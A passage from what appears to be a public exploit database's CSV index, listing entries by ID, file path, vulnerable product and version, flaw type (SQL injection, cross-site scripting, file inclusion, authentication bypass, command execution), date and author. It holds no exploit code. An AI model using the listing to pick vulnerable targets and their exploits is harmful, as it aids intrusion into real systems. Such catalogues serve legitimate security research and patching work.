Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps, -30358,exploits/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information",2013-12-16,"Matt O'Connor",hardware,webapps, -30792,exploits/php/webapps/30792.html,"Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor Access",2007-11-21,D4m14n,php,webapps, -30356,exploits/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Persistent Cross-Site Scripting",2013-12-16,"null pointer",php,webapps, -30415,exploits/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",hardware,webapps, -30357,exploits/php/webapps/30357.txt,"iScripts MultiCart 2.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Cross-Site Scripting / Cross-Site Request Forgery / Mass Accounts Takeover",2013-12-16,"Saadi Siddiqui",php,webapps, -30361,exploits/hardware/webapps/30361.txt,"Beetel TC1-450 Airtel Wireless Router - Multiple Cross-Site Request Forgery Vulnerabilities",2013-12-16,"Samandeep Singh",hardware,webapps, -30362,exploits/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross-Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",hardware,webapps, -30876,exploits/php/webapps/30876.txt,"Falcon Series One 1.4.3 stable - Multiple Input Validation Vulnerabilities",2007-11-10,MhZ91,php,webapps, -30364,exploits/php/webapps/30364.txt,"Lowest Unique Bid Auction - SQL Injection",2013-12-16,3spi0n,php,webapps, -30365,exploits/php/webapps/30365.txt,"Penny Auction 5 - SQL Injection",2013-12-16,3spi0n,php,webapps, -30800,exploits/asp/webapps/30800.html,"FooSun - 'Api_Response.asp' SQL Injection",2007-11-23,flyh4t,asp,webapps, -30396,exploits/php/webapps/30396.txt,"Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities",2013-12-17,"Martin Wundram",php,webapps,80 -30398,exploits/php/webapps/30398.txt,"InstantCMS 1.10.3 - Blind SQL Injection",2013-12-17,"High-Tech Bridge SA",php,webapps,80 -40521,exploits/php/webapps/40521.txt,"Thatware 0.4.6 - SQL Injection",2016-10-13,Besim,php,webapps, -30402,exploits/asp/webapps/30402.txt,"Nukedit 4.9.x - 'login.asp' Cross-Site Scripting",2007-07-26,d3hydr8,asp,webapps, -30403,exploits/php/webapps/30403.txt,"WordPress Plugin WP-FeedStats 2.1 - HTML Injection",2007-07-26,"David Kierznowski",php,webapps, -40518,exploits/php/webapps/40518.txt,"Simple Blog PHP 2.0 - Multiple Vulnerabilities",2016-10-13,"Ehsan Hosseini",php,webapps, -40519,exploits/php/webapps/40519.txt,"Simple Blog PHP 2.0 - SQL Injection",2016-10-13,"Ehsan Hosseini",php,webapps, -30405,exploits/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps, -30408,exploits/php/webapps/30408.txt,"Jenkins 1.523 - Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps, -30409,exploits/php/webapps/30409.txt,"SonarQube Jenkins Plugin - Plain Text Password",2013-12-18,"Christian Catalano",php,webapps, -31463,exploits/asp/webapps/31463.txt,"Iatek Knowledge Base - 'content_by_cat.asp' SQL Injection",2008-03-20,xcorpitx,asp,webapps, -31466,exploits/cgi/webapps/31466.txt,"Webutil 2.3/2.7 - 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps, -31467,exploits/php/webapps/31467.txt,"phpMyChat 0.14.5 - 'setup.php3' Cross-Site Scripting",2008-03-22,ZoRLu,php,webapps, -31468,exploits/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages - Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps, -30799,exploits/php/webapps/30799.txt,"MySpace Scripts Poll Creator - 'index.php' HTML Injection",2007-11-22,Doz,php,webapps, -30873,exploits/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 - '/myalbum/ratephoto.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps, -30874,exploits/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 - '/modules/banners/click.php?bid' SQL Injection",2007-12-10,Lostmon,php,webapps, -30875,exploits/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 - '/modules/arcade/index.php?gid' SQL Injection",2007-12-10,Lostmon,php,webapps, -30423,exploits/asp/webapps/30423.txt,"Metyus Forum Portal 1.0 - 'Philboard_Forum.asp' SQL Injection",2007-07-27,Cr@zy_King,asp,webapps, -30424,exploits/asp/webapps/30424.txt,"Berthanas Ziyaretci Defteri 2.0 - 'Yonetici.asp' SQL Injection",2007-07-28,Yollubunlar,asp,webapps, -30425,exploits/asp/webapps/30425.txt,"Online Store Application Template - 'Sign_In.aspx' SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps, -30426,exploits/asp/webapps/30426.txt,"Message Board / Threaded Discussion Forum - 'Sign_In.aspx' SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps, -30427,exploits/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI - 'login.asp' SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps, -30428,exploits/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog - SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps, -30429,exploits/php/webapps/30429.txt,"phpCoupon - Remote Payment Bypass",2007-07-28,freeprotect.net,php,webapps, -30433,exploits/php/webapps/30433.txt,"IT!CMS 0.2 - 'lang-en.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps, -30434,exploits/php/webapps/30434.txt,"IT!CMS 0.2 - 'menu-ed.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps, -30435,exploits/php/webapps/30435.txt,"IT!CMS 0.2 - 'titletext-ed.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps, -30436,exploits/php/webapps/30436.txt,"Global Centre Aplomb Poll 1.1 - 'index.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps, -30437,exploits/php/webapps/30437.txt,"Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps, -30438,exploits/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 - 'admin.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps, -30440,exploits/cgi/webapps/30440.txt,"WebEvent 4.03 - 'Webevent.cgi' Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps, -30442,exploits/php/webapps/30442.txt,"WebDirector - 'index.php' Cross-Site Scripting",2007-08-01,r0t,php,webapps, -30443,exploits/php/webapps/30443.txt,"WordPress Theme Persuasion 2.x - Arbitrary File Download / File Deletion",2013-12-23,"Interference Security",php,webapps,80 -30445,exploits/php/webapps/30445.txt,"Joomla! Component Tour de France Pool 1.0.1 Module - MosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,php,webapps, -30446,exploits/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 - 'Duyuruoku.asp' SQL Injection",2007-08-02,Yollubunlar.Org,asp,webapps, -30448,exploits/php/webapps/30448.txt,"Lanius CMS 1.2.14 FAQ Module - 'mid' SQL Injection",2007-08-03,k1tk4t,php,webapps, -30449,exploits/php/webapps/30449.txt,"Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' SQL Injection",2007-08-03,k1tk4t,php,webapps, -30450,exploits/php/webapps/30450.txt,"Lanius CMS 1.2.14 GALLERY Module - 'gid' SQL Injection",2007-08-03,k1tk4t,php,webapps, -30451,exploits/asp/webapps/30451.txt,"Next Gen Portfolio Manager - 'default.asp' Multiple SQL Injections",2007-08-03,"Aria-Security Team",asp,webapps, -30452,exploits/php/webapps/30452.txt,"J! Reactions 1.8.1 - comPath Remote File Inclusion",2007-08-04,Yollubunlar.Org,php,webapps, -30453,exploits/php/webapps/30453.txt,"snif 1.5.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps, -30456,exploits/php/webapps/30456.txt,"VietPHP - '_functions.php?dirpath' Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps, -30457,exploits/php/webapps/30457.txt,"VietPHP - '/admin/index.php?language' Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps, -30810,exploits/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - 'Password' SQL Injection",2007-11-26,JosS,php,webapps, -30459,exploits/php/webapps/30459.txt,"VietPHP - 'index.php?language' Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps, -30463,exploits/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps, -30900,exploits/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution",2014-01-14,"Arash Abedian",hardware,webapps,80 -30465,exploits/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps, -30466,exploits/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps, -30467,exploits/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps, -30472,exploits/linux/webapps/30472.rb,"Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,webapps,7071 -30475,exploits/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80 -30476,exploits/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80 -30478,exploits/php/webapps/30478.txt,"PHP MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,cr4wl3r,php,webapps,80 -30479,exploits/php/webapps/30479.txt,"Shoutbox 1.0 - 'Shoutbox.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps, -30480,exploits/php/webapps/30480.txt,"Bilder Galerie 1.0 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps, -30481,exploits/php/webapps/30481.txt,"Web News 1.1 - 'index.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps, -30482,exploits/php/webapps/30482.txt,"Web News 1.1 - 'feed.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps, -30483,exploits/php/webapps/30483.txt,"Web News 1.1 - 'news.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps, -30486,exploits/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps, -30487,exploits/php/webapps/30487.txt,"PHP-Stats 0.1.9.2 - 'WhoIs.php' Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps, -30488,exploits/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - 'index.php' Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps, -30489,exploits/php/webapps/30489.txt,"Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps, -30492,exploits/php/webapps/30492.txt,"SkilMatch Systems JobLister3 - 'index.php' SQL Injection",2007-07-13,joseph.giron13,php,webapps, -30501,exploits/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusions",2007-07-09,Crackers_Child,php,webapps, -30504,exploits/php/webapps/30504.txt,"Olate Download 3.4.1 - 'admin.php' Remote Authentication Bypass",2007-07-16,imei,php,webapps, -30505,exploits/asp/webapps/30505.txt,"Text File Search Classic - 'TextFileSearch.asp' Cross-Site Scripting",2007-08-17,GeFORC3,asp,webapps, -30509,exploits/php/webapps/30509.txt,"Dalai Forum 1.1 - 'forumreply.php' Local File Inclusion",2007-08-20,DarKdewiL,php,webapps, -30510,exploits/php/webapps/30510.txt,"Firesoft - 'Class_TPL.php' Remote File Inclusion",2007-08-20,DarKdewiL,php,webapps, -30511,exploits/php/webapps/30511.txt,"Gurur Haber 2.0 - 'Uyeler2.php' SQL Injection",2007-08-20,dumenci,php,webapps, -30514,exploits/java/webapps/30514.txt,"ALeadSoft Search Engine Builder - Search.HTML Cross-Site Scripting",2007-08-21,MustLive,java,webapps, -30515,exploits/php/webapps/30515.txt,"coWiki - 'index.php' Cross-Site Scripting",2007-08-21,MustLive,php,webapps, -30516,exploits/php/webapps/30516.txt,"m-phorum 0.3 - 'index.php' Cross-Site Scripting",2007-08-21,CodeXpLoder'tq,php,webapps, -30518,exploits/php/webapps/30518.txt,"Ripe Website Manager 0.8.x - '/pages/delete_page.php?id' SQL Injection",2007-08-22,"Nagendra Kumar G",php,webapps, -30520,exploits/php/webapps/30520.txt,"WordPress 1.0.7 - 'Pool index.php' Cross-Site Scripting",2007-08-13,MustLive,php,webapps, -30525,exploits/php/webapps/30525.txt,"Arcadem 2.01 - 'index.php' Remote File Inclusion",2007-08-24,sm0k3,php,webapps, -30531,exploits/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 - 'index.php' Cross-Site Scripting",2007-08-27,d3hydr8,php,webapps, -30533,exploits/php/webapps/30533.txt,"Dale Mooney Calendar Events - 'Viewevent.php' SQL Injection",2007-08-27,s0cratex,php,webapps, -30534,exploits/php/webapps/30534.txt,"PHPGedView 4.1 - 'login.php' Cross-Site Scripting",2007-08-27,"Joshua Morin",php,webapps, -30539,exploits/php/webapps/30539.txt,"ACG News 1.0 - 'index.php' Multiple SQL Injections",2007-08-28,SmOk3,php,webapps, -30541,exploits/asp/webapps/30541.txt,"Cisco CallManager 4.2 / CUCM 4.2 - Logon Page 'lang' SQL Injection",2007-08-29,anonymous,asp,webapps, -30545,exploits/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps, -30547,exploits/hardware/webapps/30547.txt,"D-Link DSL-2750u ME_1.09 - Cross-Site Request Forgery",2013-12-28,"FIGHTERx war",hardware,webapps, -30969,exploits/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Inclusion",2008-01-02,"AmnPardaz Security Research Team",php,webapps, -31030,exploits/php/webapps/31030.pl,"WordPress Plugin SpamBam - Key Calculation Security Bypass",2007-01-15,Romero,php,webapps, -30872,exploits/php/webapps/30872.txt,"DomPHP 0.83 - SQL Injection",2014-01-13,Houssamix,php,webapps, -30553,exploits/php/webapps/30553.txt,"Toms Gästebuch 1.00 - 'form.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-07,cod3in,php,webapps, -30554,exploits/php/webapps/30554.txt,"Toms Gästebuch 1.00 - '/admin/header.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-07,cod3in,php,webapps, -30555,exploits/php/webapps/30555.txt,"MKPortal 1.0/1.1 - 'admin.php' Authentication Bypass",2007-09-03,Demential,php,webapps, -30556,exploits/php/webapps/30556.html,"Claroline 1.x - '/inc/lib/language.lib.php?language' Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps, -30557,exploits/php/webapps/30557.txt,"Claroline 1.x - '/admin/adminusers.php?dir' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps, -30558,exploits/php/webapps/30558.txt,"Claroline 1.x - '/admin/advancedUserSearch.php?action' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps, -30559,exploits/php/webapps/30559.txt,"Claroline 1.x - '/admin/campusProblem.php?view' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps, -30560,exploits/php/webapps/30560.txt,"212Cafe WebBoard 6.30 - 'Read.php' SQL Injection",2007-09-04,"Lopez Bran Digrap",php,webapps, -31025,exploits/cgi/webapps/31025.txt,"Garment Center - 'index.cgi' Local File Inclusion",2008-01-14,Smasher,cgi,webapps, -30877,exploits/php/webapps/30877.txt,"Roundcube Webmail 0.1 - CSS Expression Input Validation",2007-11-10,"Tomas Kuliavas",php,webapps, -30878,exploits/php/webapps/30878.txt,"Bitweaver 1.x/2.0 - 'users/register.php' Cross-Site Scripting",2007-11-10,Doz,php,webapps, -30879,exploits/php/webapps/30879.txt,"Bitweaver 1.x/2.0 - 'search/index.php' Cross-Site Scripting",2007-11-10,Doz,php,webapps, -30880,exploits/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - '/search/index.php?highlight' SQL Injection",2007-11-10,Doz,php,webapps, -30881,exploits/php/webapps/30881.txt,"PHP-Nuke 8.0 - 'autohtml.php' Local File Inclusion",2007-11-10,d3v1l,php,webapps, -30563,exploits/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps, -30564,exploits/asp/webapps/30564.txt,"E-Smart Cart 1.0 - 'login.asp' SQL Injection",2007-09-04,SmOk3,asp,webapps, -30568,exploits/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 - 'index.php' Local File Inclusion",2007-09-06,mafialbano,php,webapps, -30570,exploits/php/webapps/30570.txt,"Toms Gastebuch 1.00/1.01 - 'header.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-08,hd1979,php,webapps, -30571,exploits/asp/webapps/30571.txt,"Proxy Anket 3.0.1 - 'anket.asp' SQL Injection",2007-09-10,Yollubunlar.Org,asp,webapps, -30572,exploits/php/webapps/30572.txt,"PHPMyQuote 0.20 - '/index.php' SQL Injection / Cross-Site Scripting",2007-09-10,Yollubunlar.Org,php,webapps, -30573,exploits/php/webapps/30573.txt,"SisfoKampus - 'dwoprn.php' Arbitrary File Download",2007-09-10,PUPET,php,webapps, -30575,exploits/php/webapps/30575.txt,"BOINC 5.10.20 - 'forum_forum.php?id' Cross-Site Scripting",2007-09-12,Doz,php,webapps, -30576,exploits/php/webapps/30576.txt,"BOINC 5.10.20 - 'text_search_action.php?search_string' Cross-Site Scripting",2007-09-12,Doz,php,webapps, -30577,exploits/php/webapps/30577.txt,"SWSoft Plesk 8.2 - 'login.php3' PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps, -32387,exploits/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",php,webapps, -32415,exploits/php/webapps/32415.txt,"Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections",2008-09-24,"Justin C. Klein Keane",php,webapps, -32413,exploits/php/webapps/32413.txt,"InterTech WCMS - 'etemplate.php' SQL Injection",2008-09-23,"GeNiUs IrAQI",php,webapps, -32412,exploits/asp/webapps/32412.txt,"Omnicom Content Platform - 'browser.asp' Directory Traversal",2008-09-23,AlbaniaN-[H],asp,webapps, -32411,exploits/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting",2008-09-23,"Hadi Kiamarsi",php,webapps, -32410,exploits/php/webapps/32410.txt,"6rbScript - 'cat.php' SQL Injection",2008-09-22,"Karar Alshami",php,webapps, -32389,exploits/php/webapps/32389.txt,"Quick Cart 3.1 - 'admin.php' Cross-Site Scripting",2008-09-17,"John Cobb",php,webapps, -32409,exploits/php/webapps/32409.txt,"Achievo 1.3.2 - 'atknodetype' Cross-Site Scripting",2008-09-20,"Rohit Bansal",php,webapps, -32408,exploits/php/webapps/32408.txt,"BlueCUBE CMS - 'tienda.php' SQL Injection",2008-09-21,r45c4l,php,webapps, -32407,exploits/php/webapps/32407.txt,"BLUEPAGE CMS 2.5 - 'PHPSESSID' Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps, -32406,exploits/php/webapps/32406.txt,"xt:Commerce 3.04 - 'XTCsid' Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps, -32405,exploits/php/webapps/32405.txt,"xt:Commerce 3.04 - 'advanced_search_result.php?keywords' Cross-Site Scripting",2008-09-22,"David Vieira-Kurz",php,webapps, -32404,exploits/php/webapps/32404.html,"Fuzzylime (cms) 3.0 - 'usercheck.php' Cross-Site Scripting",2008-09-22,"Fabian Fingerle",php,webapps, -32403,exploits/php/webapps/32403.txt,"MapCal 0.1 - 'id' SQL Injection",2008-09-22,0x90,php,webapps, -32402,exploits/php/webapps/32402.txt,"UNAK-CMS - Cookie Authentication Bypass",2008-09-22,Ciph3r,php,webapps, -32401,exploits/asp/webapps/32401.txt,"rgb72 WCMS 1.0 - 'index.php' SQL Injection",2008-09-22,"CWH Underground",asp,webapps, -35491,exploits/php/webapps/35491.txt,"PBBoard CMS - Persistent Cross-Site Scripting",2014-12-08,"Manish Tanwar",php,webapps, -32398,exploits/php/webapps/32398.txt,"eXtrovert software Thyme 1.3 - 'add_calendars.php' Cross-Site Scripting",2008-09-21,"DigiTrust Group",php,webapps, -32397,exploits/php/webapps/32397.txt,"PHP Pro Bid 5.2.4/6.04 - Multiple SQL Injections",2008-09-19,"Jan Van Niekerk",php,webapps, -32396,exploits/php/webapps/32396.txt,"Parallels H-Sphere 3.0/3.1 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-19,t0fx,php,webapps, -32395,exploits/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 - Database Disclosure",2008-09-19,r45c4l,php,webapps, -32394,exploits/asp/webapps/32394.txt,"Sama Educational Management System - 'error.asp' Cross-Site Scripting",2008-09-18,Lagon666,asp,webapps, -32392,exploits/php/webapps/32392.pl,"Add a link 4 - Security Bypass / SQL Injection",2008-09-17,JosS,php,webapps, -32388,exploits/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",php,webapps, -33984,exploits/hardware/webapps/33984.rb,"NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,hardware,webapps, -30581,exploits/php/webapps/30581.txt,"CS-Guestbook 0.1 - Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,php,webapps, -30583,exploits/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - 'Tracking.php' Cross-Site Scripting",2007-09-14,root@hanicker.it,php,webapps, -30585,exploits/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps, -30586,exploits/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera - Web Interface 'axis-cgi/admin/pwdgrp.cgi' Multiple Cross-Site Request Forgery Vulnerabilities",2007-09-14,"Seth Fogie",cgi,webapps, -30587,exploits/cgi/webapps/30587.txt,"Axis Communications 207W Network Camera - Web Interface '/admin/restartMessage.shtml?server' Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps, -30588,exploits/php/webapps/30588.txt,"ewire Payment Client 1.60/1.70 - Command Execution",2007-09-17,anonymous,php,webapps, -30591,exploits/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise 7.1 - Remote Command Execution",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps, -30594,exploits/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.12 - 'referer' Cross-Site Scripting",2007-09-17,L4teral,php,webapps, -30595,exploits/php/webapps/30595.txt,"Coppermine Photo Gallery 1.4.12 - 'log' Local File Inclusion",2007-09-17,L4teral,php,webapps, -30596,exploits/php/webapps/30596.txt,"b1gMail 6.3.1 - 'hilfe.php' Cross-Site Scripting",2007-09-17,malibu.r,php,webapps, -30597,exploits/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router - 'RC' Cross-Site Scripting",2007-09-19,azizov,cgi,webapps, -30598,exploits/cgi/webapps/30598.txt,"WebBatch - 'webbatch.exe' Cross-Site Scripting",2007-09-20,Doz,cgi,webapps, -30599,exploits/cgi/webapps/30599.txt,"WebBatch - 'webbatch.exe?dumpinputdata' Remote Information Disclosure",2007-09-20,Doz,cgi,webapps, -30601,exploits/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module - Multiple Cross-Site Scripting Vulnerabilities",2007-09-20,x0kster,php,webapps, -30602,exploits/php/webapps/30602.html,"WordPress 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps, -30603,exploits/php/webapps/30603.html,"XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps, -30606,exploits/cgi/webapps/30606.txt,"Urchin 5.7.x - 'session.cgi' Cross-Site Scripting",2007-09-24,pagvac,cgi,webapps, -30607,exploits/php/webapps/30607.txt,"bcoos 1.0.10 Arcade Module - 'index.php' SQL Injection",2007-09-24,"nights shadow",php,webapps, -30608,exploits/jsp/webapps/30608.txt,"JSPWiki 2.5.139 - 'NewGroup.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps, -30609,exploits/jsp/webapps/30609.txt,"JSPWiki 2.5.139 - 'edit.jsp?edittime' Cross-Site Scripting",2007-09-25,"Jason Kratzer",jsp,webapps, -30610,exploits/jsp/webapps/30610.txt,"JSPWiki 2.5.139 - 'Comment.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps, -30611,exploits/jsp/webapps/30611.txt,"JSPWiki 2.5.139 - 'UserPreferences.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps, -30612,exploits/jsp/webapps/30612.txt,"JSPWiki 2.5.139 - 'Login.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps, -30613,exploits/jsp/webapps/30613.txt,"JSPWiki 2.5.139 - 'Diff.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps, -30614,exploits/php/webapps/30614.txt,"PHP-Nuke Dance Music Module - 'index.php' Local File Inclusion",2007-09-25,waraxe,php,webapps, -30615,exploits/php/webapps/30615.txt,"SimpGB 1.46.2 - '/admin/?l_username' Cross-Site Scripting",2007-09-25,netVigilance,php,webapps, -30616,exploits/php/webapps/30616.txt,"SimpGB 1.46.2 - '/admin/emoticonlist.php?l_emoticonlist' Cross-Site Scripting",2007-09-25,netVigilance,php,webapps, -30617,exploits/php/webapps/30617.txt,"SimpNews 2.41.3 - 'l_username' Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps, -30618,exploits/php/webapps/30618.txt,"SimpNews 2.41.3 - 'backurl' Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps, -30621,exploits/asp/webapps/30621.txt,"Novus 1.0 - 'Buscar.asp' Cross-Site Scripting",2007-09-27,Zutr4,asp,webapps, -30623,exploits/php/webapps/30623.pl,"MD-Pro 1.0.76 - 'index.php' Firefox ID SQL Injection",2007-09-29,"unidentified1_ is",php,webapps, -30624,exploits/asp/webapps/30624.txt,"Netkamp Emlak Scripti - Multiple Input Validation Vulnerabilities",2007-10-01,GeFORC3,asp,webapps, -30625,exploits/asp/webapps/30625.txt,"Ohesa Emlak Portal 1.0 - 'satilik.asp?Kategori' SQL Injection",2007-10-01,GeFORC3,asp,webapps, -30626,exploits/asp/webapps/30626.txt,"Ohesa Emlak Portal 1.0 - 'detay.asp?Emlak' SQL Injection",2007-10-01,GeFORC3,asp,webapps, -30629,exploits/asp/webapps/30629.txt,"ASP Product Catalog 1.0 - 'default.asp' SQL Injection",2007-10-01,joseph.giron13,asp,webapps, -30632,exploits/php/webapps/30632.txt,"DRBGuestbook 1.1.13 - 'index.php' Cross-Site Scripting",2007-10-03,Gokhan,php,webapps, -30633,exploits/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps, -30634,exploits/php/webapps/30634.txt,"Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps, -30637,exploits/php/webapps/30637.js,"WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps, -30638,exploits/php/webapps/30638.txt,"GForge 4.6/4.5/3.1 - 'Verify.php' Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps, -30968,exploits/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps, -30639,exploits/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps, -30640,exploits/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps, -30641,exploits/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x - 'login.php?mode' Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps, -30642,exploits/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - 'default.asp?mode2' Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps, -30647,exploits/php/webapps/30647.txt,"SNewsCMS 2.1 - 'News_page.php' Cross-Site Scripting",2007-10-08,medconsultation.ru,php,webapps, -30649,exploits/cgi/webapps/30649.txt,"NetWin DNews - 'Dnewsweb.exe' Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps, -30651,exploits/php/webapps/30651.txt,"Joomla! 